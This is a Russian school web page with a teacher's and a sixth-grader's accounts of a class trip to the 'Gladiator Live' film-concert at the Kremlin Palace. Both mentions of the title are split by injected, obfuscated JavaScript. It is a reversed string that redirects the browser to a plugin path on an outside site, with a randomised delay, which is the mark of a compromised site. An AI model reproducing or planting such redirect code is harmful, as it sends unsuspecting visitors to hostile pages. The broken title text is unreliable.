logo

Поход на концертную версию легендарного фильма «Гладиатор»

18 ноября 2016 года ученики 6-7 классов посетили Государственный Кремлёвский Дворец, где состоялась премьера концертной версии легендарного фильма «Гладиатор» — «Gladiatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor. Live» при участии Симфонического оркестра Москвы «Русская филармония» и артистов хора Государственной академической хоровой капеллы России имени А.А. Юрлова (художественный руководитель — Г.А. Дмитряк)
Выдающиеся композиторы Ханс Циммер и Лиза Джеррард вместе с режиссером Ридли Скоттом создали поистине уникальное зрелище – фильм-концерт «Gladiatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor. Live» – о силе и отваге, о чести, достоинстве и славе. Саундтрек, написанный к фильму, принес создателям пять Оскаров, четыре Британских BAFTA и два Золотых Глобуса.
Это было необычное зрелище, очень красочное, непохожее на просмотр фильма. Кинопоказ сопровождался музыкой симфонического оркестра и пением хора. Особенно запомнился прекрасный голос певицы, которая сумела погрузить нас своим удивительным голосом в атмосферу античности. Ее исполнение погружало слушателя доисторические времена. Музыка была главным героем этого представления!
Благодаря этому мероприятию мы смогли перенестись в захватывающий мир приключений, истинной дружбы, любви и преданности, аутентичных нарядов и быта, гладиаторских боев и зрелищных античных сражений. Сочетание прекрасных кадров из фильма, музыки и вокала передало колорит эпохи, в то же время в этом необыкновенном представлении воспеты вечные человеческие ценности.

Куратор 7 класса Калашникова Светлана Николаевна

…В эти выходные я ходил в Кремль на фильм-концерт «Гладиатор». Мне очень понравилось! Атмосфера была очень красивая, как в древнем Риме. Это шоу длилось 3 часа. Выступление мне показалось очень поучающим, потому что этот фильм был на английском языке, показывали историю Древнего Рима, его уклад и традиции. Мне очень понравились сцены битв гладиаторов в Колизее, битва при Карфагене. Фильм шел в сопровождении оркестра, хора и певицы с очень красивым голосом. Когда был антракт, все зрители ринулись в буфет, а мы стояли и смотрели в окно на Кремль. Такие шоу станут новой формой искусства. Через два дня с нами связался кларнетист. Он рассказывал, как все артистам было трудно. Мне это очень понравилось и надеюсь, я пойду туда еще раз.

Гуданов Степан (6 класс)

1nzinpxzhtm q9rkrmtcszk